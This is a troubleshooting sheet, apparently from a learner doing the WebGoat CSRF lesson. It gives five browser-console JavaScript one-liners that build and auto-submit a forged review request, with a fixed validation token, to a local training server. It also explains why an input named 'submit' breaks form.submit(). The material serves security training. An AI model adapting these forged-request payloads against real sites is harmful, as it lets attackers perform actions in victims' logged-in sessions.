=== CSRF Review - Fixed Browser Console Commands ===

ERROR: "f.submit is not a function"

This happens because an input field named "submit" overrides the form's submit() method.

=== SOLUTION 1: Use HTMLFormElement.prototype.submit ===

Paste this in Browser Console (F12):

const f=document.createElement('form');f.method='POST';f.action='http://192.168.254.112:8001/WebGoat/csrf/review';[{n:'stars',v:'5'},{n:'reviewText',v:'CSRF!'},{n:'validateReq',v:'2aa14227b9a13d0bede0388a7fba9aa9'},{n:'submit',v:'Submit'}].forEach(p=>{const i=document.createElement('input');i.name=p.n;i.value=p.v;f.appendChild(i);});document.body.appendChild(f);HTMLFormElement.prototype.submit.call(f);


=== SOLUTION 2: Without "submit" parameter ===

Try without the submit field:

const f=document.createElement('form');f.method='POST';f.action='http://192.168.254.112:8001/WebGoat/csrf/review';[{n:'stars',v:'5'},{n:'reviewText',v:'CSRF!'},{n:'validateReq',v:'2aa14227b9a13d0bede0388a7fba9aa9'}].forEach(p=>{const i=document.createElement('input');i.name=p.n;i.value=p.v;f.appendChild(i);});document.body.appendChild(f);f.submit();


=== SOLUTION 3: Use button click instead ===

const f=document.createElement('form');f.method='POST';f.action='http://192.168.254.112:8001/WebGoat/csrf/review';[{n:'stars',v:'5'},{n:'reviewText',v:'CSRF!'},{n:'validateReq',v:'2aa14227b9a13d0bede0388a7fba9aa9'}].forEach(p=>{const i=document.createElement('input');i.name=p.n;i.value=p.v;f.appendChild(i);});const btn=document.createElement('button');btn.textContent='Submit';f.appendChild(btn);document.body.appendChild(f);btn.click();


=== SOLUTION 4: Use requestSubmit() ===

Modern browsers support requestSubmit():

const f=document.createElement('form');f.method='POST';f.action='http://192.168.254.112:8001/WebGoat/csrf/review';[{n:'stars',v:'5'},{n:'reviewText',v:'CSRF!'},{n:'validateReq',v:'2aa14227b9a13d0bede0388a7fba9aa9'},{n:'submit',v:'Submit'}].forEach(p=>{const i=document.createElement('input');i.name=p.n;i.value=p.v;f.appendChild(i);});document.body.appendChild(f);f.requestSubmit();


=== SOLUTION 5: Simplest - Open in new window ===

window.open('http://192.168.254.112:8001/WebGoat/csrf/review?stars=5&reviewText=CSRF&validateReq=2aa14227b9a13d0bede0388a7fba9aa9', '_blank', 'width=800,height=600');

Note: This uses GET instead of POST, might not work.


=== RECOMMENDED: Use HTML File ===

The HTML files don't have this issue. Use:
- csrf_review_fixed.html (best option)
- csrf_post_review.html

These properly handle the submit without conflicts.


=== WHY THIS HAPPENS ===

When you name an input "submit", it becomes:
f.submit = <input element>

This overwrites the form's submit() method!

Solutions:
1. Use HTMLFormElement.prototype.submit.call(f)
2. Don't name any field "submit"
3. Use f.requestSubmit() instead
4. Click a button instead of calling submit()


TRY THESE IN ORDER:
✅ SOLUTION 1 - Uses prototype (most reliable)
✅ SOLUTION 2 - No submit field (simpler)
✅ SOLUTION 4 - Modern API
✅ HTML File - No issues at all
